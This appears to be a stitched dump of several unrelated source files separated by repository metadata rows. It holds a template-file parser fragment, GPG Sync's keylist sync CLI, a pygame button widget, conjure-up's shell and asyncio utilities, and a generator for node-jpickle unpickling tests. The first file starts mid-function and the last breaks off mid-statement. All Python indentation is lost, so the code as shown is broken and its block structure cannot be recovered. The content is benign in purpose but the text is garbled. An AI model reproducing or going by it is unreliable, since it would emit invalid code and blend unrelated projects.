self.segments[infileName] = []
if not os.path.exists(inputFile.getAbsFile()):
## Make sure to cast the inputFile to a string as it may be File object.
raise IOError('Input file not found: ' + str(inputFile))
seg = ''
lines = inputFile.readlines()
inputFile.close()
for line in lines:
while self.prefixKey in line and self.postfixKey in line:
self.segments[infileName].append(seg)
start = line.find(self.prefixKey)
end = line.find(self.postfixKey,start+1)
var = line[start+len(self.prefixKey):end]
if defaultDelim in var or formatDelim in var:
optionalPos = [None]*2
optionalPos[0], optionalPos[1] = var.find(defaultDelim), var.find(formatDelim)
if optionalPos[0] == -1:
optionalPos[0] = sys.maxsize
if optionalPos[1] == -1:
optionalPos[1] = sys.maxsize
defval = var[optionalPos[0]+1:min(optionalPos[1],len(var))] if optionalPos[0] < optionalPos[1] else var[min(optionalPos[0]+1,len(var)):len(var)]
varformat = var[min(optionalPos[1]+1,len(var)):len(var)] if optionalPos[0] < optionalPos[1] else var[optionalPos[1]+1:min(optionalPos[0],len(var))]
var = var[0:min(optionalPos)]
if var in self.defaults.keys() and optionalPos[0] != sys.maxsize:
print('multiple default values given for variable',var)
if var in self.formats.keys() and optionalPos[1] != sys.maxsize:
print('multiple format values given for variable',var)
#TODO allow the user to specify take-last or take-first?
if var not in self.defaults.keys() and optionalPos[0] != sys.maxsize:
self.defaults[var] = {}
if var not in self.formats.keys() and optionalPos[1] != sys.maxsize:
self.formats[var ] = {}
if optionalPos[0] != sys.maxsize:
self.defaults[var][infileName]=defval
if optionalPos[1] != sys.maxsize:
# check if the format is valid
if not any(formVal in varformat for formVal in self.acceptFormats.keys()):
try:
int(varformat)
except ValueError:
raise ValueError("the format specified for wildcard "+ line[start+len(self.prefixKey):end] +
" is unknown. Available are either a plain integer or the following "+" ".join(self.acceptFormats.keys()))
self.formats[var][infileName ]=varformat,int
else:
for formVal in self.acceptFormats.keys():
if formVal in varformat:
self.formats[var][infileName ]=varformat,self.acceptFormats[formVal]; break
self.segments[infileName].append(line[:start])
self.segments[infileName].append(var)
if var not in self.varPlaces.keys():
self.varPlaces[var] = {infileName:[len(self.segments[infileName])-1]}
elif infileName not in self.varPlaces[var].keys():
self.varPlaces[var][infileName]=[len(self.segments[infileName])-1]
else:
self.varPlaces[var][infileName].append(len(self.segments[infileName])-1)
#self.segments.append(line[end+1:])
line=line[end+1:]
seg = ''
else:
seg+=line
self.segments[infileName].append(seg)
def modifyInternalDictionary(self,**Kwargs):
"""
Edits the parsed file stored in self.segments to enter new variable values preperatory to a new run.
@ In, **Kwargs, dict, dict including moddit (the dictionary of variable:value to replace) and additionalEdits.
@ Out, None
"""
modDict = Kwargs['SampledVars']
self.adlDict = Kwargs.get('additionalEdits',{})
ioVars = []
for value in self.adlDict.values():
if type(value)==dict:
for k in value.keys():
ioVars.append(k)
elif type(value)==list:
for v in value:
ioVars.append(v)
else:
ioVars.append(value)
for var in self.varPlaces.keys():
for inputFile in self.segments.keys():
for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
if var in modDict.keys():
if var in self.formats.keys():
if inputFile in self.formats[var].keys():
if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](modDict[var]))
else:
self.segments[inputFile][place] = _reprIfFloat(modDict[var]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
else:
self.segments[inputFile][place] = _reprIfFloat(modDict[var])
elif var in self.defaults.keys():
if var in self.formats.keys():
if inputFile in self.formats[var].keys():
if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](self.defaults[var][inputFile]))
else:
self.segments[inputFile][place] = _reprIfFloat(self.defaults[var][inputFile]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
else:
self.segments[inputFile][place] = self.defaults[var][inputFile]
elif var in ioVars:
continue #this gets handled in writeNewInput
else:
raise IOError('Generic Parser: Variable '+var+' was not sampled and no default given!')
def writeNewInput(self,inFiles,origFiles):
"""
Generates a new input file with the existing parsed dictionary.
@ In, inFiles, list, Files list of new input files to return
@ In, origFiles, list, the original list of Files, used for key names
@ Out, None
"""
#get the right IO names put in
case = 'out~'+inFiles[0].getBase() #FIXME the first entry? This is bad! Forces order somewhere in input file
# however, I can't seem to generate an error with this, so maybe it's okay
def getFileWithExtension(fileList,ext):
"""
Just a script to get the file with extension ext from the fileList.
@ In, fileList, list, the Files list of files to pick from.
@ In, ext, string, the string extension that the desired filename ends with.
@ Out, None
"""
found=False
for index,inputFile in enumerate(fileList):
if inputFile.getExt() == ext:
found=True
break
if not found:
raise IOError('No InputFile with extension '+ext+' found!')
return index,inputFile
for var in self.varPlaces.keys():
for inputFile in self.segments.keys():
for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
for iotype,adlvar in self.adlDict.items():
if iotype=='output':
if var==self.adlDict[iotype]:
self.segments[inputFile][place] = case
break
elif iotype=='input':
if var in self.adlDict[iotype].keys():
self.segments[inputFile][place] = getFileWithExtension(inFiles,self.adlDict[iotype][var][0].strip('.'))[1].getAbsFile()
break
#now just write the files.
for f,inFile in enumerate(origFiles):
outfile = inFiles[f]
#if os.path.isfile(outfile.getAbsFile()): os.remove(outfile.getAbsFile())
outfile.open('w')
outfile.writelines(''.join(self.segments[inFile.getFilename()]))
outfile.close()
| apache-2.0 | -5,199,687,621,181,177,000 | 48.527523 | 175 | 0.630638 | false | 3.853319 | false | false | false |
firstlookmedia/gpgsync | gpgsync/cli.py | 1 | 4731 | # -*- coding: utf-8 -*-
"""
GPG Sync
Helps users have up-to-date public keys for everyone in their organization
https://github.com/firstlookmedia/gpgsync
Copyright (C) 2016 First Look Media
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import queue
import threading
import time
import sys
from .keylist import Keylist, RefresherMessageQueue
def worker(common, keylist, force, status):
"""
Sync a single keylist, to be run in a separate thread
"""
cancel_q = queue.Queue()
result = Keylist.refresh(common, cancel_q, keylist, force=force)
keylist.interpret_result(result)
status[keylist.id]['result'] = result
def sync(common, force=False):
"""
Sync all keylists.
"""
print("GPG Sync {}\n".format(common.version))
num_keylists = len(common.settings.keylists)
# Status is a dictionary where keys are the keylist "id", a
# concatination of the keylist URL and fingerprint
status = {}
ids = [] # ordered list of ids
# Build the status object, and display keylist indexes
for i in range(num_keylists):
keylist = common.settings.keylists[i]
keylist.id = keylist.fingerprint + b':' + keylist.url
ids.append(keylist.id)
status[keylist.id] = {
"index": i,
"event": None,
"str": None,
"result": None,
"keylist": keylist
}
print("[{}] Keylist {}, with authority key {}".format(i, keylist.url.decode(), keylist.fingerprint.decode()))
print("")
# Start threads
threads = []
for keylist in common.settings.keylists:
keylist.q = RefresherMessageQueue()
t = threading.Thread(target=worker, args=(common, keylist, force, status,))
threads.append(t)
t.start()
# Monitor queues for updates
while True:
# Process the last event in the LIFO queues
for keylist in common.settings.keylists:
try:
event = keylist.q.get(False)
if event['status'] == RefresherMessageQueue.STATUS_IN_PROGRESS:
status[keylist.id]['event'] = event
except queue.Empty:
pass
# Display
for id in ids:
if not status[id]['event']:
status[id]['str'] = '[{0:d}] Syncing...'.format(status[id]['index'])
else:
percent = (status[id]['event']['current_key'] / status[id]['event']['total_keys']) * 100;
status[id]['str'] = '[{0:d}] {1:d}/{2:d} ({3:d}%)'.format(
status[id]['index'],
status[id]['event']['current_key'],
status[id]['event']['total_keys'],
int(percent))
sys.stdout.write('{} \r'.format(' '.join([status[id]['str'] for id in ids])))
# Are all keylists finished syncing?
done = True
for id in ids:
if not status[id]['result']:
done = False
break
if done:
sys.stdout.write('\n\n')
break
else:
# Wait a bit before checking for updates again
time.sleep(1)
# Make sure all threads are finished
for t in threads:
t.join()
# Display the results
for id in ids:
result = status[id]['result']
keylist = status[id]['keylist']
if result['type'] == 'success':
if keylist.warning:
print("[{0:d}] Sync successful. Warning: {1:s}".format(status[id]['index'], keylist.warning))
else:
print("[{0:d}] Sync successful.".format(status[id]['index']))
elif result['type'] == 'error':
print("[{0:d}] Sync failed. Error: {1:s}".format(status[id]['index'], keylist.error))
elif result['type'] == 'cancel':
print("[{0:d}] Sync canceled.".format(status[id]['index']))
elif result['type'] == 'skip':
print("[{0:d}] Sync skipped. (Use --force to force syncing.)".format(status[id]['index']))
else:
print("[{0:d}] Unknown problem with sync.".format(status[id]['index']))
| gpl-3.0 | 9,160,136,683,872,163,000 | 33.786765 | 117 | 0.581484 | false | 4.002538 | false | false | false |
MarkusHackspacher/PythonFarmGame | pygameui/button.py | 1 | 3351 | from __future__ import absolute_import
import os
import pygame
from pygameui.widget import Widget
buttonbgpath = os.path.join("images", "gui", "buttonbg.png")
class Button(Widget):
"""Button Widget
"""
def __init__(self, label, position, bgimage=None, labelsize=12,
color=(255, 255, 0)):
self.bgimage = bgimage
self.label = label
self.color = color
self.position = position
self.labelsize = labelsize
self.labelfont = pygame.font.Font("dejavusansmono.ttf", self.labelsize)
self.buttonbgorg = pygame.image.load(buttonbgpath).convert_alpha()
self.buttonbg = self.buttonbgorg.copy()
# Setup image
if not self.bgimage:
self._settextimage()
else:
self._setsize(self._calculate_size(self.bgimage))
Widget.__init__(self, self.position, self.width, self.height)
def _render_text(self):
"""_render_text
:return:
"""
img = self.labelfont.render(self.label, 0, self.color)
return img.convert_alpha()
@staticmethod
def _calculate_size(image):
"""_calculate_size
:param image:
:return:
"""
width = image.get_size()[0] + 4
height = image.get_size()[1]
return (width, height)
def _settextimage(self):
"""_set text image
:return:
"""
self.image = self._render_text()
self._setsize(self._calculate_size(self.image))
def setimage(self, newimage):
"""set image
:param newimage:
:return:
"""
self.image = newimage
self._setsize(self._calculate_size(self.image))
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.create_widget_image()
if self.label and self.bgimage:
img = self._render_text()
self.img.blit(img, (2, 0))
self.img.blit(self.bgimage, (0, 0))
elif not self.bgimage:
img = pygame.transform.smoothscale(self.buttonbgorg, self.size)
self.buttonbg = img
self.img.blit(self.buttonbg, (0, 0))
self.img.blit(self.image, (2, 0))
elif not self.label and self.bgimage:
self.img.blit(self.bgimage, (0, 0))
# draw rectangle on hover
if self.insidewidget:
pygame.draw.line(self.img, self.color, (1, self.height - 1),
(self.width, self.height - 1))
# mark modified
self.mark_modified()
def settext(self, newtext):
"""settext
:param newtext:
:return:
"""
self.label = newtext
self._settextimage()
self.repaint()
def poll_event(self, event):
"""poll_event
:param event:
:return:
"""
Widget.poll_event(self, event)
pos = self.parent.get_relative_mousepos()
# mouse button down
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and pos\
and self.pointinwidget(pos[0], pos[1]):
# on_click event
self.call_callback("clicked")
self.call_callback("onclick")
# make button active
if self.parent:
self.parent.makeactive(self)
| gpl-3.0 | -1,803,105,317,518,656,000 | 26.694215 | 79 | 0.547299 | false | 3.803632 | false | false | false |
Ubuntu-Solutions-Engineering/conjure | conjureup/utils.py | 1 | 23501 | import asyncio
import codecs
import errno
import json
import logging
import os
import pty
import re
import shutil
import socket
import subprocess
import sys
import uuid
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from itertools import chain
from pathlib import Path
from subprocess import PIPE, Popen, check_call, check_output
import aiofiles
from pkg_resources import parse_version
from raven.processors import SanitizePasswordsProcessor
from termcolor import cprint
from conjureup import consts
from conjureup.app_config import app
from conjureup.models.metadata import SpellMetadata
from conjureup.telemetry import track_event
@contextmanager
def chdir(directory):
"""Change the current working directory to a different directory for a code
block and return the previous directory after the block exits. Useful to
run commands from a specificed directory.
:param str directory: The directory path to change to for this context.
"""
cur = os.getcwd()
try:
yield os.chdir(directory)
finally:
os.chdir(cur)
def run(cmd, **kwargs):
""" Compatibility function to support python 3.4
"""
try:
from subprocess import run as _run
return _run(cmd, **kwargs)
except ImportError:
if 'check' in kwargs:
del kwargs['check']
return check_call(cmd, **kwargs)
else:
return check_output(cmd, **kwargs)
def run_script(path, stderr=PIPE, stdout=PIPE):
return run(path, shell=True, stderr=stderr, stdout=stdout, env=app.env)
def run_attach(cmd, output_cb=None):
""" run command and attach output to cb
Arguments:
cmd: shell command
output_cb: where to display output
"""
stdoutmaster, stdoutslave = pty.openpty()
subproc = Popen(cmd, shell=True,
stdout=stdoutslave,
stderr=PIPE)
os.close(stdoutslave)
decoder = codecs.getincrementaldecoder('utf-8')()
def last_ten_lines(s):
chunk = s[-1500:]
lines = chunk.splitlines(True)
return ''.join(lines[-10:]).replace('\r', '')
decoded_output = ""
try:
while subproc.poll() is None:
try:
b = os.read(stdoutmaster, 512)
except OSError as e:
if e.errno != errno.EIO:
raise
break
else:
final = False
if not b:
final = True
decoded_chars = decoder.decode(b, final)
if decoded_chars is None:
continue
decoded_output += decoded_chars
if output_cb:
ls = last_ten_lines(decoded_output)
output_cb(ls)
if final:
break
finally:
os.close(stdoutmaster)
if subproc.poll() is None:
subproc.kill()
subproc.wait()
errors = [l.decode('utf-8') for l in subproc.stderr.readlines()]
if output_cb:
output_cb(last_ten_lines(decoded_output))
errors = ''.join(errors)
if subproc.returncode == 0:
return decoded_output.strip()
else:
raise Exception("Problem running {0} "
"{1}:{2}".format(cmd,
subproc.returncode))
async def arun(cmd, input=None, check=False, env=None, encoding='utf8',
stdin=PIPE, stdout=PIPE, stderr=PIPE, cb_stdout=None,
cb_stderr=None, **kwargs):
""" Run a command using asyncio.
If ``stdout`` or ``stderr`` are strings, they will treated as filenames
and the data from the proces will be written (streamed) to them. In this
case, ``cb_stdout`` and ``cb_stderr`` can be given as callbacks to call
with each line from the respective handle.
:param list cmd: List containing the command to run, plus any args.
:param dict **kwargs:
"""
env = dict(app.env, **(env or {}))
outf = None
errf = None
try:
if isinstance(stdout, str):
outf = await aiofiles.open(stdout, 'w')
stdout = PIPE
if isinstance(stderr, str):
errf = await aiofiles.open(stderr, 'w')
stderr = PIPE
proc = await asyncio.create_subprocess_exec(*cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
env=env,
**kwargs)
data = {}
async def tstream(source_name, sink, ui_cb):
source = getattr(proc, source_name)
while proc.returncode is None:
async for line in source:
line = line.decode(encoding)
if ui_cb:
ui_cb(line)
data.setdefault(source_name, []).append(line)
if sink:
await sink.write(line)
await sink.flush()
await asyncio.sleep(0.01)
tasks = []
if input:
if isinstance(input, str):
input = input.encode(encoding)
tasks.append(proc._feed_stdin(input))
if proc.stdout:
tasks.append(tstream('stdout', outf, cb_stdout))
if proc.stderr:
tasks.append(tstream('stderr', errf, cb_stderr))
await asyncio.gather(*tasks)
await proc.wait()
finally:
if outf:
await outf.close()
if errf:
await errf.close()
stdout_data = ''.join(data.get('stdout', [])) if proc.stdout else None
stderr_data = ''.join(data.get('stderr', [])) if proc.stderr else None
if check and proc.returncode != 0:
raise subprocess.CalledProcessError(proc.returncode,
cmd, stdout_data, stderr_data)
return (proc.returncode, stdout_data, stderr_data)
def sentry_report(message=None, exc_info=None, tags=None, **kwargs):
app.loop.run_in_executor(None, partial(_sentry_report,
message, exc_info, tags, **kwargs))
def _sentry_report(message=None, exc_info=None, tags=None, **kwargs):
if app.no_report:
return
try:
default_tags = {
'spell': app.config.get('spell'),
'cloud_type': app.provider.cloud_type if app.provider else None,
'region': app.provider.region if app.provider else None,
'jaas': app.is_jaas,
'headless': app.headless,
'juju_version': juju_version()
}
if message is not None and exc_info is None:
event_type = 'raven.events.Message'
kwargs['message'] = message
if 'level' not in kwargs:
kwargs['level'] = logging.WARNING
else:
event_type = 'raven.events.Exception'
if exc_info is None or exc_info is True:
kwargs['exc_info'] = sys.exc_info()
else:
kwargs['exc_info'] = exc_info
if 'level' not in kwargs:
kwargs['level'] = logging.ERROR
kwargs['tags'] = dict(default_tags, **(tags or {}))
app.sentry.capture(event_type, **kwargs)
except Exception:
pass
async def can_sudo(password=None):
if not password and app.sudo_pass:
password = app.sudo_pass
if password:
opt = '-S' # stdin
password = '{}\n'.format(password).encode('utf8')
else:
opt = '-n' # non-interactive
proc = await asyncio.create_subprocess_exec('sudo', opt, '/bin/true',
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if password:
await proc.communicate(password)
else:
await proc.wait()
return proc.returncode == 0
def juju_version():
""" Get current Juju version
"""
cmd = run_script('{} version'.format(app.juju.bin_path))
if cmd.returncode == 0:
return parse_version(cmd.stdout.decode().strip())
else:
raise Exception("Could not determine Juju version.")
def snap_version():
""" Get snap version
"""
cmd = run_script('snap version')
if cmd.returncode == 0:
name_version_str = cmd.stdout.decode().splitlines()[0]
try:
name, version = name_version_str.split()
if '~' in version:
version, series = version.split('~')
return parse_version(version)
except:
raise Exception("Could not determine Snap version.")
def send_msg(msg, label, color, attrs=['bold']):
if app.conjurefile['color'] == 'auto':
colorized = sys.__stdout__.isatty()
elif app.conjurefile['color'] == 'always':
colorized = True
else:
colorized = False
if app.conjurefile['debug']:
print("[{}] {}".format(label, msg))
elif colorized:
cprint("[{}] ".format(label),
color,
attrs=attrs,
end="{}\n".format(msg), flush=True)
else:
print("[{}] {}".format(label, msg), flush=True)
def info(msg):
send_msg(msg, 'info', 'green')
def error(msg):
send_msg(msg, 'error', 'red')
def warning(msg):
send_msg(msg, 'warning', 'yellow')
def install_home():
""" returns installer user home
"""
return os.path.expanduser("~" + install_user())
def juju_path():
""" returns juju path for $user
"""
return os.getenv('JUJU_DATA',
os.path.expanduser('~/.local/share/juju'))
def mkdir(path):
if not os.path.isdir(path):
os.makedirs(path)
chown(path, install_user(), recursive=True)
def _normalize_bundle(original_bundle, overlay_bundle):
""" Normalizes top level application/services keys
"""
if 'applications' in original_bundle and 'services' in overlay_bundle:
overlay_bundle['applications'] = overlay_bundle.pop('services')
if 'services' in original_bundle and 'applications' in overlay_bundle:
overlay_bundle['services'] = overlay_bundle.pop('applications')
def merge_dicts(*dicts):
"""
Return a new dictionary that is the result of merging the arguments
together.
In case of conflicts, later arguments take precedence over earlier
arguments.
ref: http://stackoverflow.com/a/8795331/3170835
"""
updated = {}
# grab all keys
keys = set()
for d in dicts:
keys = keys.union(set(d))
for key in keys:
values = [d[key] for d in dicts if key in d]
# which ones are mapping types? (aka dict)
maps = [value for value in values if isinstance(value, Mapping)]
lists = [value for value in values if isinstance(value, (list, tuple))]
if maps:
# if we have any mapping types, call recursively to merge them
updated[key] = merge_dicts(*maps)
elif lists:
# if any values are lists, we want to merge them (non-recursively)
# first, ensure all values are lists
for i in range(len(values)):
if not isinstance(values[i], (list, tuple)):
values[i] = [values[i]]
# then, merge all of the lists into a single list
updated[key] = list(chain.from_iterable(values))
else:
# otherwise, just grab the last value we have, since later
# arguments take precedence over earlier arguments
updated[key] = values[-1]
return updated
def subtract_dicts(*dicts):
"""
Return a new dictionary that is the result of subtracting each dict
from the previous. Except for mappings, the values of the subsequent
are ignored and simply all matching keys are removed. If the value is
a mapping, however, then only the keys from the sub-mapping are removed,
recursively.
"""
result = merge_dicts(dicts[0], {}) # make a deep copy
for d in dicts[1:]:
for key, value in d.items():
if key not in result:
continue
if isinstance(value, Mapping):
result[key] = subtract_dicts(result[key], value)
if not result[key]:
# we removed everything from the mapping,
# so remove the whole thing
del result[key]
elif isinstance(value, (list, tuple)):
if not isinstance(result[key], (list, tuple)):
# if the original value isn't a list, then remove it
# if it matches any of the values in the given list
if result[key] in value:
del result[key]
else:
# for lists, remove any matching items (non-recursively)
result[key] = [item
for item in result[key]
if item not in value]
if not result[key]:
# we removed everything from the list,
# so remove the whole thing
del result[key]
else:
del result[key]
return result
def chown(path, user, group=None, recursive=False):
""" Change user/group ownership of file
Arguments:
path: path of file or directory
user: new owner username
group: new owner group name
recursive: set files/dirs recursively
"""
if group is None:
group = user
try:
if not recursive or os.path.isfile(path):
shutil.chown(path, user, group)
else:
for root, dirs, files in os.walk(path):
shutil.chown(root, user, group)
for item in dirs:
shutil.chown(os.path.join(root, item), user, group)
for item in files:
shutil.chown(os.path.join(root, item), user, group)
except OSError as e:
raise e
def spew(path, data, owner=None):
""" Writes data to path
Arguments:
path: path of file to write to
data: contents to write
owner: optional owner of file
"""
with open(path, 'w') as f:
f.write(data)
if owner:
try:
chown(path, owner)
except:
raise Exception(
"Unable to set ownership of {}".format(path))
def slurp(path):
""" Reads data from path
Arguments:
path: path of file
"""
try:
with path.open() as f:
return f.read().strip()
except IOError:
raise IOError
def install_user():
""" returns current user
"""
user = os.getenv('USER', None)
if user is None:
raise Exception("Unable to determine current user.")
return user
def set_chosen_spell(spell_name, spell_dir):
track_event("Spell Choice", spell_name, "")
app.env['CONJURE_UP_SPELL'] = spell_name
app.config.update({'spell-dir': spell_dir,
'spell': spell_name})
def set_spell_metadata():
app.metadata = SpellMetadata.load(
Path(app.config['spell-dir']) / 'metadata.yaml')
def get_spell_metadata(spell):
""" Returns metadata about spell
"""
metadata_path = Path(app.config['spells-dir']) / spell / 'metadata.yaml'
return SpellMetadata.load(metadata_path)
def __available_on_darwin(key):
""" Returns True if spell is available on macOS
"""
metadata = get_spell_metadata(key)
if metadata.cloud_whitelist \
and 'localhost' in metadata.cloud_whitelist:
return False
if metadata.spell_type == consts.spell_types.SNAP:
return False
return True
def find_spells():
""" Find spells, excluding localhost only and snap spells if not linux
"""
_spells = []
for category, cat_dict in app.spells_index.items():
for sd in cat_dict['spells']:
if is_darwin() and not __available_on_darwin(sd['key']):
continue
_spells.append((category, sd))
return _spells
def find_addons_matching(key):
if key in app.addons_aliases:
return app.addons_aliases[key]
return {}
def find_spells_matching(key):
if key in app.spells_index:
_spells = []
for sd in app.spells_index[key]['spells']:
if is_darwin() and not __available_on_darwin(sd['key']):
continue
_spells.append((key, sd))
return _spells
for category, d in app.spells_index.items():
for spell in d['spells']:
if spell['key'] == key:
if is_darwin() and not __available_on_darwin(spell['key']):
continue
return [(category, spell)]
return []
def get_options_whitelist(service_name):
"""returns list of whitelisted option names.
If there is no whitelist, returns []
"""
metadata = app.metadata
if metadata is None:
return []
options_whitelist = metadata.options_whitelist
if options_whitelist is None:
return []
svc_opts_whitelist = options_whitelist.get(service_name, [])
return svc_opts_whitelist
def gen_hash():
""" generates a UUID
"""
return str(uuid.uuid4()).split('-')[0][:3]
def gen_model():
""" generates a unique model name
"""
name = "conjure-{}".format(app.env['CONJURE_UP_SPELL'])
return "{}-{}".format(name[:24], gen_hash())
def gen_cloud():
""" generates a unique cloud
"""
name = "cloud-{}".format(app.provider.cloud_type)
return "{}-{}".format(name[:24], gen_hash())
def is_darwin():
""" Checks if host platform is macOS
"""
return sys.platform.startswith('darwin')
def is_linux():
""" Checks if host platform is linux
"""
return sys.platform.startswith('linux')
def is_valid_hostname(hostname):
""" Checks if a hostname is valid
Graciously taken from http://stackoverflow.com/a/2532344/3170835
"""
if len(hostname) > 255:
return False
if hostname[-1] == ".":
# strip exactly one dot from the right, if present
hostname = hostname[:-1]
allowed = re.compile(r"(?!-)[A-Z\d\-\_]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def set_terminal_title(title):
""" Sets the terminal title
"""
sys.stdout.write("\x1b]2;{}\x07".format(title))
def get_physical_network_interfaces():
""" Returns a list of physical network interfaces
We whitelist eth due to some instances where users run
conjure-up inside a single LXD container. At that point
all devices are considered virtual and all network device
naming follows the ethX pattern.
"""
sys_class_net = Path('/sys/class/net')
devices = []
for device in sys_class_net.glob("*"):
parts = str(device.resolve()).split('/')
if "virtual" in parts and not parts[-1].startswith('eth'):
continue
try:
if not get_physical_network_ipaddr(device.name):
continue
except Exception:
continue
devices.append(device.name)
if len(devices) == 0:
raise Exception(
"Could not find a suitable physical network interface "
"to create a LXD bridge on. Please check your network "
"configuration.")
return sorted(devices)
def get_physical_network_ipaddr(iface):
""" Gets an IP Address for network device, ipv4 only
Arguments:
iface: interface to query
"""
out = run_script('ip addr show {}'.format(iface))
if out.returncode != 0:
raise Exception(
"Could not determine an IPv4 address for {}".format(iface))
app.log.debug("Parsing {} for IPv4 address".format(
out.stdout.decode('utf8')))
try:
ipv4_addr = out.stdout.decode(
'utf8').split('inet ')[1].split('/')[0]
except IndexError:
return None
return ipv4_addr
def get_open_port():
""" Gets an unused port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class IterQueue(asyncio.Queue):
"""
Queue subclass that supports the ``async for`` syntax.
When the producer is done adding items, it must call `close` to
notify the consumer.
Example::
queue = IterQueue()
async def consumer():
async for line in queue:
print(line)
async def producer():
with open('filename') as fp:
for line in fp:
await queue.put(line)
queue.close()
"""
def __init__(self, *args, **kwargs):
self.sentinal = []
super().__init__(*args, **kwargs)
def __aiter__(self):
return self
async def __anext__(self):
item = await self.get()
if item is self.sentinal:
raise StopAsyncIteration
return item
async def close(self):
await self.put(self.sentinal)
class SanitizeDataProcessor(SanitizePasswordsProcessor):
"""
Sanitize data sent to Sentry.
Performs the same santiziations as the SanitizePasswordsProcessor, but
also sanitizes values.
"""
def sanitize(self, key, value):
value = super().sanitize(key, value)
if value is None:
return value
def _check_str(s):
sl = s.lower()
for field in self.KEYS:
if field not in sl:
continue
if 'invalid' in s or 'error' in s:
return '***(contains invalid {})***'.format(field)
else:
return '***(contains {})***'.format(field)
return s
if isinstance(value, str):
# handle basic strings
value = _check_str(value)
elif isinstance(value, bytes):
# handle bytes
value = _check_str(value.decode('utf8', 'replace'))
elif isinstance(value, (list, tuple, set)):
# handle list-like
orig_type = type(value)
value = list(value)
for i, item in enumerate(value):
value[i] = self.sanitize(key, item)
value = orig_type(value)
elif isinstance(value, dict):
# handle dicts
for key, value in value.items():
value[key] = self.sanitize(key, value)
else:
# handle everything else by sanitizing its JSON encoding
# note that we don't want to use the JSON encoded value if it's
# not being santizied, because it will end up double-encoded
value_json = json.dumps(value)
sanitized = _check_str(value_json)
if sanitized != value_json:
value = sanitized
return value
class TestError(Exception):
def __init__(self):
super().__init__('This is a dummy error for testing reporting')
class SudoError(Exception):
pass
class UtilsHTTPError(Exception):
pass
| mit | 4,256,687,583,847,943,000 | 28.785805 | 79 | 0.562274 | false | 4.192864 | false | false | false |
jlaine/node-jpickle | test/genclass_test.py | 1 | 4122 | #!/usr/bin/python
from __future__ import print_function
import pickle
import binascii
class MyClass:
def __init__(self):
self.data = "test"
class MyOtherClass:
def __init__(self):
self.myclass = MyClass()
self.myclasses = [ MyClass(), MyClass() ]
self.myclasses[0].data = "new test value"
class MySubClass(MyOtherClass):
def __init__(self):
MyOtherClass.__init__(self)
self.subvalue = 12
myclass = MyClass()
myclassescontainer = { "myclass1" : MyClass(), "myclass2" : MyClass() }
myclassescontainer["myclass1"].data = "new test value 1"
myclassescontainer["myclass2"].data = "new test value 2"
myotherclass = MyOtherClass()
mysubclass = MySubClass()
testfile = open("./class_tests.js", "w")
print("var assert = require('assert'),\n" \
" util = require('util'),\n" \
" jpickle = require('../lib/jpickle');\n\n", file = testfile )
print("function MyClass() {\n" \
"}\n\n", file = testfile )
print("function MyOtherClass() {\n" \
" this.mymethod = function() { return this.myclass.data + ' foo!';}; \n" \
"}\n\n", file = testfile )
print("function MySubClass() {\n" \
"}\n" \
"util.inherits(MySubClass, MyOtherClass);\n\n", file = testfile )
print("jpickle.emulated['__main__.MyClass'] = MyClass;\n" \
"jpickle.emulated['__main__.MyOtherClass'] = MyOtherClass;\n" \
"jpickle.emulated['__main__.MySubClass'] = MySubClass;\n\n", file = testfile )
print("\ndescribe('pickle version 2 classes', function() {\n", file = testfile )
print(" it('should decode simple classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.data, 'test');\n" \
" });\n\n" % pickle.dumps( myclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode simple classes in a container', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded['myclass1'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass2'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass1'].data, 'new test value 1');\n" \
" assert.strictEqual(decoded['myclass2'].data, 'new test value 2');\n" \
" });\n\n" % pickle.dumps( myclassescontainer, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode a subclass and a superclass', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded instanceof MySubClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" assert.strictEqual(decoded.subvalue, 12);\n" \
